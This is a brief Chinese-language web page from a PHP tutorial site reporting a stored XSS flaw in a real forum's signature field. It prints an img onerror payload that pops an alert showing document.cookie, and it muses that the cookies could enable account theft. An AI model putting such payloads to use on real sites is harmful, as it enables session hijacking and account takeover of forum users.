来源:自学PHP网 时间:2015-04-15 15:00 作者: 阅读:次
[导读] 随便找一个论坛链接http: home focus cn msgview 1632 270131257 html在个人签名处输入:pimg height=0 onerror=alert( 亲,这里有个xss漏洞你们知道吗 );alert(document cookie) src= width=0...
|
随便找一个论坛链接
http://home.focus.cn/msgview/1632/270131257.html
在个人签名处输入:
  <p>
<img height="0" onerror="alert(/亲,这里有个xss漏洞你们知道吗/);alert(document.cookie)" src="#" width="0" />这个人很懒,留下个弹窗</p>
弹个小窗
 cookie很多料,估计可盗号(没试,纯YY)
 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
